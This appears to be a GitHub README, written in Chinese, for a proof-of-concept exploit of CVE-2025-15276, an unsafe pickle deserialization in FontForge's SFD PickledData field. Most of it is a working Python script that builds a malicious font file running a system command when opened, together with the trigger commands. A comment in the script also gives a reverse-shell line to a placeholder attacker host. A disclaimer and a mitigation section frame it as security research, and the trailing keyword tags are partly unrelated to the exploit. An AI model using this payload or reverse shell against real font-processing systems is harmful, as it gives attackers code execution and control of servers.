ahmedreda38/CVE-2025-15276-poc

# CVE-2025-15276：FontForge SFD PickledData 不安全反序列化 (RCE) ## 免责声明 **本概念验证 仅用于教育目的和安全审计。** 作者不对任何滥用此信息的行为负责。未经授权访问计算机系统是非法的。在对任何系统进行安全测试之前，请务必获得明确许可。 ## 漏洞概述 **CVE-2025-15276** 是 **FontForge**（版本号至 **20230101** 及更早版本）中的一个严重 **远程代码执行 (RCE)** 漏洞。该缺陷存在于 Spline Font Database (`.sfd`) 格式的解析过程中，具体位于 `PickledData` 字段。 ### 技术细节 FontForge 的 SFD 格式允许使用 `PickledData` 关键字存储持久的 Python 字典。当加载字体时，FontForge 会提取此字符串并将其直接传递给 Python 的 `pickle.loads()` 函数（或等效的内部反序列化例程），而未进行任何清理或沙箱处理。 由于 Python `pickle` 模块本质上不安全且允许任意对象重构，攻击者可以利用 `__reduce__` 方法，以运行 FontForge 用户的权限执行任意系统命令。 ## 复现步骤 ### 1. 环境要求 - **存在漏洞的 FontForge：** 版本 `20230101` 或更早版本。 - **Python 3.x：** 用于生成恶意 payload。 ### 2. 生成恶意 SFD 文件 使用以下 Python 脚本 (`gen_poc.py`) 创建一个 `exploit.sfd` 文件。此 PoC 配置为在 `/tmp/pwned` 中创建一个文件，作为安全的入侵指标。 ``` import pickle import os # 对于反向 shell："bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1" cmd = "touch /tmp/pwned" class Exploit(object): def __reduce__(self): return (os.system, (cmd,)) # 使用 Protocol 0 (ASCII) 序列化对象以兼容 SFD payload = pickle.dumps(Exploit(), protocol=0).decode('ascii') # 根据 SFD 格式要求转义反斜杠和引号 escaped_payload = payload.replace('\\', '\\\\').replace('"', '\\"') # 构建最小化的 SFD 结构 sfd_content = f"""SplineFontDB: 3.2 FontName: ExploitFont FullName: Exploit Font FamilyName: Exploit Weight: Regular PickledData: "{escaped_payload}" EndSplineFont """ with open("exploit.sfd", "w") as f: f.write(sfd_content) print("[+] exploit.sfd generated successfully.") ``` ### 3. 触发漏洞 只需使用 FontForge 打开文件即可触发该漏洞。 **选项 A：标准 GUI/CLI 加载** ``` fontforge exploit.sfd ``` **选项 B：Python 脚本接口（常见于自动化 pipeline）** ``` fontforge -c 'import fontforge; fontforge.open("exploit.sfd")' ``` ### 4. 验证 检查命令是否已执行： ``` ls -l /tmp/pwned ``` ## 自动化环境中的影响 此漏洞在**字体处理 pipeline**（例如，在后端使用 FontForge 处理用户上传文件的基于 Web 的字体转换器或自动化验证脚本）中尤为危险。如果后端脚本对不受信任的 `.sfd` 文件调用 `fontforge.open()`，攻击者将获得对处理服务器的完全控制权。 ## 缓解措施 1. **更新 FontForge：** 升级到最新版本（v78.1.1 或更高版本），这些不安全的反序列化路径已在其中被修补或限制。 2. **清理输入：** 如果您正在使用 FontForge API 构建工具，请在处理之前严格验证文件格式，并且绝不允许处理来自不可信来源的 `.sfd` 文件。 3. **沙箱隔离：** 在低权限容器（例如 Docker）或受限 sandbox 内运行字体处理任务，以限制潜在入侵的影响。 ## 参考 - [CVE-2025-15276 NVD 条目](https://nvd.nist.gov/vuln/detail/CVE-2025-15276) - [Zero Day Initiative (ZDI) 报告](https://www.zerodayinitiative.com/) - [FontForge GitHub 仓库](https://github.com/fontforge/fontforge)

标签：CISA项目, CVE-2025-15276, DNS 反向解析, FontForge, Go语言工具, PoC, Python Pickle, RCE, SFD文件解析, 不安全的反序列化, 任意代码执行, 反序列化漏洞, 文件格式漏洞, 暴力破解, 编程工具, 网络信息收集, 网络安全, 远程代码执行, 逆向工具, 隐私保护, 零日漏洞, 验证代码